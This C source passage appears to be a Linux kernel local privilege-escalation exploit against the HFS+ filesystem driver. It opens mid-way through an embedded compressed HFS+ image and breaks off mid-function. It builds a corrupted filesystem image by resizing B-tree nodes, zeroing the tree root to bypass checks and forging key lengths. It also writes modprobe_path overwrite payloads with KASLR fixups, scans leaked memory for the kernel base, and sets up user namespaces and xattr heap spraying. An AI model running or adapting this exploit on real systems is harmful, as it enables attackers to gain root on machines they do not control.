  0xd5, 0xa9, 0x3d, 0x2c, 0x57, 0xb9, 0x4a, 0x9e, 0xab, 0x42, 0xc7, 0x42,
  0xf0, 0x1b, 0x8c, 0xa8, 0xd0, 0x55, 0x5d, 0x72, 0x85, 0x59, 0xeb, 0x53,
  0xbb, 0xf6, 0x29, 0x54, 0x05, 0x98, 0x51, 0x11, 0xed, 0xff, 0xb1, 0x74,
  0x95, 0x1e, 0xa4, 0x09, 0x26, 0x0f, 0x3a, 0x2b, 0x45, 0xa5, 0x2f, 0x44,
  0xe5, 0xac, 0xe3, 0x42, 0xca, 0x58, 0xf9, 0x62, 0xb8, 0xae, 0xb2, 0xf2,
  0x92, 0xcd, 0x51, 0xfd, 0x65, 0x86, 0x40, 0x21, 0xf0, 0xb6, 0xb3, 0x38,
  0xc9, 0xe8, 0x69, 0x81, 0x46, 0x37, 0x56, 0x23, 0x69, 0x75, 0x26, 0x80,
  0xff, 0x52, 0xff, 0xdb, 0xcf, 0x84, 0xa5, 0x7e, 0x9f, 0x99, 0x59, 0x65,
  0x9a, 0x83, 0x8b, 0xff, 0x7d, 0x87, 0xce, 0x97, 0xdd, 0xa3, 0x7e, 0x37,
  0xab, 0xaa, 0xba, 0x96, 0x2e, 0x3d, 0x9f, 0xcc, 0x9e, 0x62, 0xfa, 0xf2,
  0x6b, 0xe0, 0x8e, 0x98, 0xb7, 0x0c, 0x0b, 0x4d, 0xd1, 0x7b, 0xa5, 0xa8,
  0xb0, 0x92, 0x05, 0x92, 0xe7, 0x5f, 0x4a, 0x46, 0xe7, 0x36, 0xb0, 0x25,
  0xa7, 0xfb, 0xcd, 0x42, 0xd9, 0xf2, 0xb9, 0x0f, 0xfd, 0x79, 0xcf, 0xdc,
  0x47, 0xe6, 0xaf, 0xac, 0x62, 0x16, 0x32, 0xb3, 0xb0, 0xc4, 0x14, 0x3e,
  0xab, 0x83, 0xe6, 0xe7, 0xe6, 0x35, 0xb9, 0x53, 0xe3, 0x53, 0x81, 0x1a,
  0x31, 0x2a, 0x19, 0x7e, 0x59, 0x93, 0x45, 0xf1, 0xc6, 0x5b, 0x2c, 0xd9,
  0xe6, 0x66, 0x56, 0xaa, 0x96, 0x55, 0x53, 0x9d, 0xa9, 0x42, 0xbf, 0x4c,
  0xf9, 0x5a, 0x03, 0xa8, 0x44, 0xce, 0x31, 0x33, 0x0c, 0x0f, 0xd3, 0xce,
  0x3f, 0x71, 0x1b, 0xb9, 0xde, 0x08, 0x5e, 0x2e, 0x4f, 0x2e, 0xaf, 0xab,
  0x06, 0x3b, 0x84, 0xc6, 0xc9, 0x25, 0x0d, 0x56, 0xb4, 0xaf, 0x17, 0x32,
  0x3c, 0x44, 0xb4, 0x1d, 0xa2, 0x86, 0xac, 0x96, 0x09, 0x4c, 0xc0, 0x62,
  0x38, 0x66, 0xe6, 0x83, 0xd8, 0xd1, 0xd5, 0xf7, 0x61, 0x08, 0xcf, 0x2a,
  0x30, 0xc9, 0x33, 0xd1, 0xb9, 0x83, 0xde, 0x5d, 0xc9, 0xe5, 0xed, 0xc7,
  0xce, 0x94, 0x8c, 0xc1, 0xfd, 0xe9, 0xeb, 0x57, 0xcd, 0xfa, 0xe1, 0x84,
  0xe8, 0xf3, 0xf8, 0xc8, 0x6e, 0x43, 0xa9, 0x5b, 0x71, 0x78, 0xa2, 0x78,
  0x23, 0x18, 0x7a, 0x45, 0x56, 0x26, 0x9d, 0x5e, 0x53, 0x3d, 0xd1, 0x65,
  0xee, 0x5d, 0x07, 0x0a, 0xad, 0xf5, 0x53, 0x21, 0xf9, 0x77, 0xcc, 0x29,
  0x7b, 0x82, 0x10, 0x01, 0x46, 0xaa, 0x5f, 0x17, 0x2e, 0x93, 0x22, 0xe6,
  0xc2, 0x54, 0x54, 0x5d, 0x75, 0xe4, 0x1c, 0xa9, 0xc8, 0x27, 0xc7, 0xdb,
  0x9d, 0xc7, 0x78, 0xe8, 0x4f, 0x40, 0x0c, 0xf7, 0xca, 0x10, 0xc3, 0x31,
  0xd8, 0xc4, 0x45, 0x25, 0xdc, 0xf6, 0x4a, 0x75, 0xbb, 0xa7, 0xd5, 0xbc,
  0xc3, 0xd8, 0xfe, 0xb2, 0xb4, 0x99, 0xd6, 0x67, 0xf8, 0xba, 0x47, 0x1b,
  0xbd, 0x87, 0x4c, 0x3b, 0x8f, 0xec, 0xe5, 0x74, 0xb1, 0x77, 0xf1, 0x83,
  0x6a, 0x23, 0x1f, 0xe0, 0xb0, 0xd2, 0xae, 0x5f, 0x0c, 0x57, 0x94, 0x9f,
  0xe6, 0xa6, 0xa7, 0x41, 0x63, 0x8a, 0x82, 0xa3, 0xed, 0x09, 0x23, 0x0f,
  0x5a, 0x6e, 0xd1, 0x23, 0x80, 0xff, 0xff, 0x0c, 0x48, 0x57, 0x73, 0xf5,
  0x0e, 0x07, 0x64, 0x60, 0x0c, 0xed, 0xa9, 0x8f, 0x6f, 0x18, 0xb9, 0x6a,
  0x7e, 0x26, 0x80, 0xc9, 0x76, 0x7b, 0x9b, 0x7a, 0x04, 0x67, 0x87, 0x1f,
  0x2a, 0xca, 0xe2, 0x84, 0x70, 0x13, 0x00, 0xf0, 0x43, 0x38, 0x08, 0xb2,
  0x18, 0x0d, 0x7c, 0x5b, 0x9d, 0x6a, 0x94, 0x77, 0xa2, 0x77, 0x0b, 0x1a,
  0x27, 0x09, 0x34, 0x1b, 0xe1, 0x00, 0x2b, 0x9f, 0x2c, 0x1b, 0x9f, 0x49,
  0xe3, 0x4d, 0x84, 0xca, 0xf9, 0xb7, 0x68, 0xee, 0xf7, 0x74, 0xe0, 0xd5,
  0xb0, 0xa7, 0xaf, 0x0f, 0x6d, 0x22, 0x3f, 0x5e, 0xbc, 0x76, 0x06, 0x38,
  0xc1, 0xb5, 0x4d, 0x87, 0xc1, 0x0f, 0xec, 0xfa, 0x42, 0x81, 0x3b, 0x9e,
  0x74, 0x17, 0xa3, 0xfd, 0xdd, 0xa3, 0x05, 0x76, 0xb3, 0x01, 0x77, 0x0b,
  0xb2, 0x0d, 0xb2, 0x71, 0x32, 0x96, 0x6a, 0x38, 0xa3, 0x62, 0xcf, 0xa1,
  0xbe, 0xd0, 0xcb, 0xbe, 0x97, 0x07, 0x8b, 0xff, 0x6a, 0x9b, 0x0e, 0x44,
  0x51, 0x7c, 0x35, 0x6b, 0xd3, 0x58, 0x40, 0xd2, 0x61, 0x1d, 0x6d, 0xfb,
  0x5e, 0x34, 0x30, 0x70, 0x20, 0x34, 0xe3, 0x0b, 0x85, 0x1e, 0xdb, 0xde,
  0x92, 0x78, 0x78, 0x7a, 0x02, 0x8b, 0xe2, 0x51, 0xfa, 0xfa, 0xc8, 0x16,
  0xf4, 0x37, 0xb2, 0xaa, 0xe1, 0x9d, 0x51, 0xbd, 0xd7, 0x1d, 0x33, 0x6f,
  0xfd, 0xad, 0x7a, 0xb3, 0xd2, 0x12, 0x6e, 0xfc, 0xfc, 0x69, 0x33, 0x9e,
  0xc7, 0x82, 0xc3, 0x59, 0xe8, 0x28, 0x4f, 0xfb, 0x63, 0xa2, 0xe7, 0x5e,
  0x12, 0x12, 0x59, 0xe1, 0x7a, 0x72, 0xcf, 0xd1, 0x02, 0xb7, 0xee, 0x48,
  0x10, 0x5a, 0x25, 0x25, 0xeb, 0xeb, 0x36, 0x0d, 0x3a, 0x2a, 0x16, 0x7a,
  0x56, 0x0c, 0xc8, 0x06, 0x9f, 0x6d, 0xea, 0x65, 0xaa, 0x89, 0xd1, 0xb5,
  0x2a, 0x49, 0x0e, 0x1d, 0xd8, 0x8a, 0x4c, 0x83, 0xa1, 0x96, 0xb2, 0x9d,
  0x2e, 0xd6, 0xc9, 0x1c, 0xa1, 0x85, 0x7a, 0x04, 0xe9, 0x93, 0x52, 0x3c,
  0xc2, 0xcb, 0xf3, 0x0f, 0x7e, 0x12, 0x2e, 0x6e, 0x88, 0xbe, 0xd1, 0x13,
  0x88, 0x22, 0x42, 0x6b, 0x63, 0x98, 0xae, 0x02, 0xb4, 0x02, 0x5c, 0x78,
  0x04, 0x5b, 0x74, 0x70, 0xd0, 0x97, 0xb0, 0x7e, 0x2d, 0x45, 0xc0, 0xcd,
  0x30, 0xbc, 0x5e, 0xce, 0x7d, 0xf3, 0x96, 0x45, 0xf8, 0xfe, 0xbe, 0x5b,
  0xc2, 0x86, 0x53, 0x0b, 0xe5, 0x61, 0x41, 0xa2, 0x8c, 0xae, 0x06, 0x02,
  0xfe, 0x01, 0x5a, 0x8c, 0xfd, 0x33, 0x35, 0x05, 0x00, 0x00
};
unsigned int vanilla_hfs_bin_len = 1258;


/* HFS+ epoch starts on January 1, 1904 */
#define HFSPLUS_EPOCH_DIFF 2082844800 /* Difference between HFS+ and Unix epoch in seconds (1904-1970) */

/* Function to convert HFS+ timestamp to Unix timestamp and then to a human-readable date */
void hfsplus_to_date(unsigned int hfsplus_timestamp)
{
    /* Convert HFS+ timestamp to Unix timestamp */
    time_t unix_timestamp = hfsplus_timestamp - HFSPLUS_EPOCH_DIFF;

    /* Convert the Unix timestamp to local time */
    struct tm *tm_info = localtime(&unix_timestamp);

    if (tm_info == NULL) {
        printf("Failed to convert timestampn");
        return;
    }

    /* Output the formatted date */
    char buffer[80];

    strftime(buffer, sizeof(buffer), "%Y-%m-%d %H:%M:%S", tm_info);
    printf("%sn", buffer);
}

void parse_tree(struct hfs_btree_header_rec *tree)
{
    struct hfs_bnode_desc *header_node = (struct hfs_bnode_desc *)((void *)tree - sizeof(struct hfs_bnode_desc));

    printf("tHeader node next: 0x%xn", be32toh(header_node->next));
    printf("tHeader node prev: 0x%xn", be32toh(header_node->prev));
    printf("tHeader node type: ");
    if (header_node->type == HFS_NODE_HEADER)
        printf("HFS_NODE_HEADERn");
    else
        printf("0x%xn", header_node->type);

    printf("tHeader node number of records: 0x%xn", be16toh(header_node->num_recs));

    printf("tDepth: 0x%xn", be16toh(tree->depth));
    printf("tRoot: 0x%xn", be32toh(tree->root));
    printf("tNode size: 0x%xn", be16toh(tree->node_size));
    printf("tMax key length: 0x%xn", be16toh(tree->max_key_len));
    printf("tNode count: 0x%xn", be32toh(tree->node_count));
    printf("tAttributes:n");
    if (be32toh(tree->attributes) & HFS_TREE_BIGKEYS)
        printf("ttHFS_TREE_BIGKEYSn");
    if (be32toh(tree->attributes) & HFS_TREE_VARIDXKEYS)
        printf("ttHFS_TREE_VARIDXKEYSn");
}


void parse_volume(const unsigned char *hfs_buffer, size_t len)
{
    struct hfsplus_vh *hfs_vh = (struct hfsplus_vh *)(hfs_buffer+0x400);

    printf("[+] Basic information about hfs+ volumen");
    printf("tSignature: 0x%xn", be16toh(hfs_vh->signature));
    printf("tVersion: 0x%xn", be16toh(hfs_vh->version));
    printf("tCreation date: ");
    hfsplus_to_date(be32toh(hfs_vh->create_date));
    printf("tBlock size: 0x%xn", be32toh(hfs_vh->blocksize));
    printf("tTotal blocks: 0x%xn", be32toh(hfs_vh->total_blocks));
    printf("tNext cnid: 0x%xn", be32toh(hfs_vh->next_cnid));


    printf("[+] Checking catalog and attribute btreesn");
    printf("tCatalog start block: 0x%xn", be32toh(hfs_vh->cat_file.extents->start_block));
    printf("tCatalog block count: 0x%xn", be32toh(hfs_vh->cat_file.extents->block_count));

    printf("tAttribute start block: 0x%xn", be32toh(hfs_vh->attr_file.extents->start_block));
    printf("tAttrbiute block count: 0x%xn", be32toh(hfs_vh->attr_file.extents->block_count));

    size_t blocksize = be32toh(hfs_vh->blocksize);

    size_t cat_tree_start_address = be32toh(hfs_vh->attr_file.extents->start_block) * blocksize;

    cat_tree_start_address += sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *cat_tree = (struct hfs_btree_header_rec *)(hfs_buffer+cat_tree_start_address);


    size_t attr_tree_start_address = be32toh(hfs_vh->attr_file.extents->start_block) * blocksize;

    attr_tree_start_address += sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *attr_tree = (struct hfs_btree_header_rec *)(hfs_buffer+attr_tree_start_address);


    printf("[+] Parsing basic stuff about catalog filen");
    parse_tree(cat_tree);

    printf("[+] Parsing basic stuff about attribute filen");
    parse_tree(attr_tree);

}


void resize_nodes(unsigned char *hfs_buffer, size_t len)
{
    uint8_t footer_node[] = {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x77, 0x00,
    0x76, 0x00, 0x75, 0x00, 0x74, 0x42, 0x00, 0x0e
    };

    struct hfsplus_vh *hfs_vh = (struct hfsplus_vh *)(hfs_buffer+0x400);
    size_t blocksize = be32toh(hfs_vh->blocksize);
    size_t attr_tree_start_address_base = be32toh(hfs_vh->attr_file.extents->start_block) * blocksize;
    size_t attr_tree_start_address = attr_tree_start_address_base + sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *attr_tree = (struct hfs_btree_header_rec *)(hfs_buffer+attr_tree_start_address);

    printf("[+] Resizing attribute tree nodes to make same space for machineryn");
    printf("tNode size: 0x%xn", be16toh(attr_tree->node_size));

    /* Let's have a bigger node size so we can fit our payloads nicely */
    attr_tree->node_size = htobe16(0x8000);

    printf("tNode size (corrupted): 0x%xn", be16toh(attr_tree->node_size));

    /* The node footer has to go to the new place */
    unsigned char *dest_address = hfs_buffer + attr_tree_start_address_base + (0x8000-0x10);
    unsigned char *src_address = hfs_buffer + attr_tree_start_address_base + (0x2000-0x10);

    printf("tOriginal footer at: 0x%lxn", (unsigned long)src_address);
    printf("tNew footer at: 0x%lxn", (unsigned long)dest_address);

    printf("tOriginal footer at (relative): 0x%lxn", (unsigned long)src_address - (unsigned long)hfs_buffer);
    printf("tNew footer at (relative): 0x%lxn", (unsigned long)dest_address - (unsigned long)hfs_buffer);

    memcpy(dest_address, src_address, 0x10);

    /* The target node footer is given by us */
    unsigned char *dest_address_node = hfs_buffer + attr_tree_start_address_base + (2 * 0x8000 - 0x10);

    memcpy(dest_address_node, &footer_node, 0x10);


    /* The node footer has to go to the new place */
    unsigned char *src_address_data = hfs_buffer + attr_tree_start_address_base + 0x2000;
    unsigned char *dest_address_data = hfs_buffer + attr_tree_start_address_base + 0x8000;

    printf("tOriginal attribute records at: 0x%lxn", (unsigned long)src_address_data);
    printf("tNew attribute records at: 0x%lxn", (unsigned long)dest_address_data);

    memcpy(dest_address_data, src_address_data, 0x200);
}

void remove_root(unsigned char *hfs_buffer, size_t len)
{
    struct hfsplus_vh *hfs_vh = (struct hfsplus_vh *)(hfs_buffer+0x400);
    size_t blocksize = be32toh(hfs_vh->blocksize);
    size_t attr_tree_start_address_base = be32toh(hfs_vh->attr_file.extents->start_block) * blocksize;
    size_t attr_tree_start_address = attr_tree_start_address_base + sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *attr_tree = (struct hfs_btree_header_rec *)(hfs_buffer+attr_tree_start_address);

    printf("[+] Removing root to bypass hfs_brec_find checksn");

    printf("tRoot: 0x%xn", be32toh(attr_tree->root));

    /* Let's zero out the root to bypass checks */
    attr_tree->root = htobe32(0x0);

    printf("tRoot (corrupted): 0x%xn", be16toh(attr_tree->root));
}


void corrupt_key_len(unsigned char *hfs_buffer, size_t len, uint16_t new_length)
{
    struct hfsplus_vh *hfs_vh = (struct hfsplus_vh *)(hfs_buffer+0x400);
    size_t blocksize = be32toh(hfs_vh->blocksize);
    size_t attr_tree_start_address_base = be32toh(hfs_vh->attr_file.extents->start_block) * blocksize;
    size_t attr_tree_start_address = attr_tree_start_address_base + sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *attr_tree = (struct hfs_btree_header_rec *)(hfs_buffer+attr_tree_start_address);
    unsigned char *address_node = hfs_buffer + attr_tree_start_address_base + 0x8000;

    printf("[+] Corrupting HFS attribute record key lengthn");

    struct hfs_bnode_desc *first_node = (struct hfs_bnode_desc *)address_node;

    printf("tNode next: 0x%xn", be32toh(first_node->next));
    printf("tNode prev: 0x%xn", be32toh(first_node->prev));
    printf("tNode type: ");
    if (first_node->type == HFS_NODE_HEADER)
        printf("HFS_NODE_HEADERn");
    else
        printf("0x%xn", first_node->type);

    printf("tNode number of records: 0x%xn", be16toh(first_node->num_recs));

    struct hfsplus_attr_key *first_key = (struct hfsplus_attr_key *)(address_node + sizeof(struct hfs_bnode_desc));

    printf("tKey length (current): 0x%xn", be16toh(first_key->key_len));
    first_key->key_len = htobe16(new_length);

    printf("tKey length (corrupted): 0x%xn", be16toh(first_key->key_len));
}


void write_payload(unsigned char *hfs_buffer, size_t len, uint8_t *payload, uint16_t payload_length)
{
    struct hfsplus_vh *hfs_vh = (struct hfsplus_vh *)(hfs_buffer+0x400);
    size_t blocksize = be32toh(hfs_vh->blocksize);
    size_t attr_tree_start_address_base = be32toh(hfs_vh->attr_file.extents->start_block) * blocksize;
    size_t attr_tree_start_address = attr_tree_start_address_base + sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *attr_tree = (struct hfs_btree_header_rec *)(hfs_buffer+attr_tree_start_address);
    unsigned char *address_node = hfs_buffer + attr_tree_start_address_base + 0x8000;
    struct hfsplus_attr_key *first_key = (struct hfsplus_attr_key *)(address_node + sizeof(struct hfs_bnode_desc));

    printf("[+] Writing kmalloc-1k payloadn");

    /* Make some 'A' padding */
    memset((void *)first_key + 0xd7, 0x41, 4*0x400);

    uint8_t *address = (uint8_t *)(address_node + sizeof(struct hfs_bnode_desc) + 0x400);

    memcpy(address, payload, payload_length);
}

void hack_hfs_keyring(unsigned char *hfs_buffer, size_t len, uint64_t dummy)
{
    /* Let's check some basic information about our volume */
    parse_volume(hfs_buffer, len);

    /* First, we hack the attribute B-tree a little bit */
    resize_nodes(hfs_buffer, len);

    /* Remove root */
    remove_root(hfs_buffer, len);

    /* Corrupt key length */
    corrupt_key_len(hfs_buffer, len, 0x418 - 2);

    uint8_t payload[24] = {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xff, 0xff, 0x53, 0x53, 0x53, 0x53, 0x53, 0x53
    };

    uint16_t payload_len = sizeof(payload);

    /* Write kmalloc-1k payload */
    write_payload(hfs_buffer, len, payload, payload_len);
}

void hack_hfs_modprobe_one(unsigned char *hfs_buffer, size_t len, uint64_t kaslr_base)
{
    /* Let's check some basic information about our volume */
    parse_volume(hfs_buffer, len);

    /* First, we hack the attribute B-tree a little bit */
    resize_nodes(hfs_buffer, len);

    /* Remove root */
    remove_root(hfs_buffer, len);

    /* Corrupt key length */
    /* -2 of what you want because fs/hfsplus/bnode.c#L66*/
    corrupt_key_len(hfs_buffer, len, 0x410 - 2);

/*
    uint8_t payload[24] = {
    0x3c, 0xf6, 0xb3, 0x82, 0xff, 0xff, 0xff, 0xff,
    0x2f, 0x62, 0x67, 0x70, 0x81, 0x88, 0xff, 0xff, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    };
*/

/*00000000: 38f6 b382 ffff ffff 2f74 6d70 8188 ffff 8......./tmp.... │*/
    uint8_t payload[16] = {
    0x38, 0xf6, 0xb3, 0x82, 0xff, 0xff, 0xff, 0xff,
    0x2f, 0x74, 0x6d, 0x70, 0x81, 0x88, 0xff, 0xff
    };

    if (kaslr_base) {
// (gdb) set *(long*)(0xffff8881019be000) = 0xffffffff82b3f638 
// (gdb) set *(long*)(0xffff8881019be008) = 0xffff8881706d742f 
/*
#define MODPROBE_ADDR_ONE 0xffffffff82b3f638
#define MODPROBE_ADDE_TWO 0xffffffff82b3f63c

#define KERNEL_BASE 0xffffffff81000000
*/

        printf("[+] Fixing up first payload with kaslr base: %lxn", kaslr_base);
        uint64_t target = MODPROBE_ADDR_ONE - KERNEL_BASE + kaslr_base;
        for (int i = 0; i < 8; i++) {
            payload[i] = (uint8_t)((target >> (8 * i)) & 0xFF);
        }
    }


    uint16_t payload_len = sizeof(payload);

    /* Write kmalloc-1k payload */
    write_payload(hfs_buffer, len, payload, payload_len);
}

void hack_hfs_modprobe_two(unsigned char *hfs_buffer, size_t len, uint64_t kaslr_base)
{
    /* Let's check some basic information about our volume */
    parse_volume(hfs_buffer, len);

    /* First, we hack the attribute B-tree a little bit */
    resize_nodes(hfs_buffer, len);

    /* Remove root */
    remove_root(hfs_buffer, len);

    /* Corrupt key length */
    /* -2 of what you want because fs/hfsplus/bnode.c#L66*/
    corrupt_key_len(hfs_buffer, len, 0x410 - 2);

/*00000000: 3cf6 b382 ffff ffff 2f62 6770 8188 ffff <......./bgp.... */

    uint8_t payload[16] = {
    0x3c, 0xf6, 0xb3, 0x82, 0xff, 0xff, 0xff, 0xff,
    0x2f, 0x62, 0x67, 0x70, 0x81, 0x88, 0xff, 0xff
    };

    if (kaslr_base) {
// (gdb) set *(long*)(0xffff8881019be000) = 0xffffffff82b3f638 
// (gdb) set *(long*)(0xffff8881019be008) = 0xffff8881706d742f 
/*
#define MODPROBE_ADDR_ONE 0xffffffff82b3f638
#define MODPROBE_ADDE_TWO 0xffffffff82b3f63c

#define KERNEL_BASE 0xffffffff81000000
*/

        printf("[+] Fixing up first payload with kaslr base: %lxn", kaslr_base);
        uint64_t target = MODPROBE_ADDR_TWO - KERNEL_BASE + kaslr_base;
        for (int i = 0; i < 8; i++) {
            payload[i] = (uint8_t)((target >> (8 * i)) & 0xFF);
        }
    }


    uint16_t payload_len = sizeof(payload);

    /* Write kmalloc-1k payload */
    write_payload(hfs_buffer, len, payload, payload_len);
}

/* Function to decompress data using zlib with gzip format */
int decompress_gzip(const unsigned char *src, size_t src_len, unsigned char **dest, size_t *dest_len)
{
    z_stream strm;
    int ret;
    size_t output_size = CHUNK; /* Initial buffer size */

    /* Allocate memory for the destination buffer */
    *dest = malloc(output_size);
    if (*dest == NULL) {
        fprintf(stderr, "Memory allocation failedn");
        return Z_MEM_ERROR;
    }

    /* Initialize the zlib stream structure */
    strm.zalloc = Z_NULL;
    strm.zfree = Z_NULL;
    strm.opaque = Z_NULL;
    strm.avail_in = src_len;
    strm.next_in = (unsigned char *)src;

    /* Initialize the zlib stream for decompression in gzip mode */
    /* 16 + MAX_WBITS enables gzip format */
    ret = inflateInit2(&strm, 16 + MAX_WBITS);
    if (ret != Z_OK) {
        /* Clean up on failure */
        free(*dest);
        return ret;
    }

    /* Track total output size */
    size_t total_out = 0;

    do {
        if (total_out + CHUNK > output_size) {
            /* Resize the buffer if it's not big enough */
            output_size += CHUNK;
            unsigned char *new_dest = realloc(*dest, output_size);

            if (new_dest == NULL) {
                inflateEnd(&strm);
                free(*dest);
                fprintf(stderr, "Reallocation failedn");
                return Z_MEM_ERROR;
            }
            *dest = new_dest;
        }

        strm.avail_out = CHUNK;
        strm.next_out = *dest + total_out;

        /* Perform the decompression */
        ret = inflate(&strm, Z_NO_FLUSH);
        if (ret == Z_STREAM_ERROR) {
            inflateEnd(&strm);
            free(*dest);
            fprintf(stderr, "Stream error during inflationn");
            return ret;
        }
        /* Update total output size */
        total_out += CHUNK - strm.avail_out;
    } while (ret != Z_STREAM_END);

    /* Set the actual output length */
    *dest_len = total_out;

    /* Clean up */
    inflateEnd(&strm);
    return Z_OK;
}

int prepare_filesystem(void (*hfs_mutator)(unsigned char *, size_t, uint64_t), char *hfs_filename, uint64_t kaslr_base)
{
    unsigned char *compressed_data = vanilla_hfs_bin;
    size_t compressed_size = vanilla_hfs_bin_len;

    /* Output buffer */
    unsigned char *decompressed = NULL;
    size_t decompressed_len = 0;

    /* Decompress 3 times */
    for (int i = 0; i < 3; i++) {
        if (decompress_gzip(compressed_data, compressed_size, &decompressed, &decompressed_len) != Z_OK) {
            fprintf(stderr, "Decompression failed at iteration %dn", i + 1);
            return 1;
        }
        /* For the next round, the output becomes the input */
        compressed_size = decompressed_len;
        /* Reuse the decompressed data as input */
        compressed_data = decompressed;
    }
    printf("[+] Decompressed size: 0x%lxn", decompressed_len);

    hfs_mutator(decompressed, decompressed_len, kaslr_base);

    FILE *file = fopen(hfs_filename, "wb");
    size_t written = fwrite(decompressed, sizeof(unsigned char), decompressed_len, file);

    if (written != decompressed_len) {
        perror("Failed to write the buffer to the file");
        fclose(file);
        exit(EXIT_FAILURE);
    }
    fclose(file);

    /* Free the allocated memory */
    free(decompressed);

    return 0;
}

long long get_precise_time(void)
{
    struct timespec ts;

    clock_gettime(CLOCK_REALTIME, &ts);
    long long milliseconds_since_epoch =
                (long long)(ts.tv_sec) * 1000 + (long long)(ts.tv_nsec) / 1000000;
    return milliseconds_since_epoch;
}

/* Function to check if a pointer is a valid kernel pointer within the KASLR range */
bool is_valid_pointer(uint64_t ptr)
{
/* if (ptr >= KERNEL_BASE_LOWER && ptr <= KERNEL_BASE_UPPER)
 * printf("Valid pointer: %lxn", ptr);
 */
    return (ptr >= KERNEL_BASE_LOWER && ptr <= KERNEL_BASE_UPPER);
}

/* Function to extract a 64-bit pointer from a byte buffer at a given position */
uint64_t extract_pointer(uint8_t *buffer, int pos)
{
    uint64_t ptr = 0;

    for (int i = 0; i < 8; i++) {
        /* Extract 8 bytes as a 64-bit pointer */
        ptr |= ((uint64_t)buffer[pos + i] << (i * 8));
    }
    return ptr;
}

/* Function to search for pointer triples and calculate KASLR base */
void find_pointer_triples(uint8_t *buffer, int buffer_size, int *success, uint64_t *kaslr_base_out)
{
    for (int i = 0; i < buffer_size - 8; i++) {
        /* Extract the first pointer */
        uint64_t first_ptr = extract_pointer(buffer, i);

        if (!is_valid_pointer(first_ptr))
            /* Skip invalid pointers */
            continue;


        /* Extract the second pointer at the offset */
        int second_ptr_pos = i + OFFSET_2ND_PTR;

        if (second_ptr_pos + 8 > buffer_size)
            continue;

        uint64_t second_ptr = extract_pointer(buffer, second_ptr_pos);

        if (!is_valid_pointer(second_ptr))
            continue;


        /* Extract the third pointer at the next offset */
        int third_ptr_pos = second_ptr_pos + OFFSET_3RD_PTR - OFFSET_2ND_PTR;

        if (third_ptr_pos + 8 > buffer_size)
            continue;

        uint64_t third_ptr = extract_pointer(buffer, third_ptr_pos);

        if (!is_valid_pointer(third_ptr))
            continue;

        /* Calculate the differences */
        int64_t diff_first = first_ptr - BASE_ADDR_FIRST;
        int64_t diff_second = second_ptr - BASE_ADDR_SECOND;
        int64_t diff_third = third_ptr - BASE_ADDR_THIRD;

        printf("n[+] Pointer triple found at byte offset %x:n", i);
        printf("tFirst pointer: 0x%lx (Difference: 0x%lx)n", first_ptr, diff_first);
        printf("tSecond pointer: 0x%lx (Difference: 0x%lx)n", second_ptr, diff_second);
        printf("tThird pointer: 0x%lx (Difference: 0x%lx)n", third_ptr, diff_third);

        /* If all three differences match, calculate the KASLR base */
        if (diff_first == diff_second && diff_first == diff_third) {
            uint64_t kaslr_base = diff_first + KERNEL_BASE;

            printf("n[+] KASLR base: 0x%lxn", kaslr_base);
            *success = 1;
            *kaslr_base_out = kaslr_base;

            /* Stop once we find the KASLR base */
            return;
        }
    }
}


sem_t *make_semaphore(int initial){
    int shm = shmget(IPC_PRIVATE, sizeof(sem_t), IPC_CREAT | 0666);

    sem_t *semaphore = shmat(shm, NULL, 0);
    sem_init(semaphore, 1, initial);
    return semaphore;
}

void set_cpu_affinity(int cpu_n, pid_t pid)
{
    cpu_set_t set;

    CPU_ZERO(&set);
    CPU_SET(cpu_n, &set);

    if (sched_setaffinity(pid, sizeof(set), &set) < 0)
        do_error_exit("sched_setaffinity");
}

void unshare_setup(void)
{
    char edit[0x100];
    int tmp_fd;

    unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);
}


void unshare_setup_xattr(uid_t uid, gid_t gid)
{
    int temp, ret;
    char edit[0x100];

    ret = unshare(CLONE_NEWNS | CLONE_NEWUSER);
    if (ret < 0)
        do_error_exit("unshare");

    temp = open("/proc/self/setgroups", O_WRONLY);
    write(temp, "deny", strlen("deny"));
    close(temp);

    temp = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1n", uid);
    write(temp, edit, strlen(edit));
    close(temp);

    temp = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1n", gid);
    write(temp, edit, strlen(edit));
    close(temp);

    ret = mount("none", "/", NULL, MS_REC | MS_PRIVATE, NULL);
    if (ret < 0)
        perror("mount root"); 
}

void write_file(char *path, char *buf, int size)
{
    int fd = open(path, O_RDWR|O_CREAT);

    write(fd, buf, size);
    close(fd);
}

void prepare_mounts(void)
{
    system("mkdir /tmp/mnt0");
    system("mkdir /tmp/mnt1"); 
    system("mkdir /tmp/mnt2"); 
}


void prepare_tmpfs(void)
{
    system("mkdir /tmp/tmpfs");
    system("mount -t tmpfs -o size=50M none /tmp/tmpfs");

    write_file("/tmp/tmpfs/xattr_node", "data", 0x4);
    write_file("/tmp/tmpfs/xattr_node_2", "data", 0x4);
    write_file("/tmp/tmpfs/xattr_node_3", "data", 0x4);
}

void unlink_xattr(int id)
{
    char xattr_name[XATTR_NAME_MAX_SIZE];

    snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%d", id);
    removexattr("/tmp/tmpfs/xattr_node", xattr_name);
}

void spray_xattr(void)
{
    char xattr_name[XATTR_NAME_MAX_SIZE];
    char xattr_value[XATTR_NAME_MAX_SIZE];

    int base_nodes[] = {7, 3, 11, 1, 5, 9, 13};
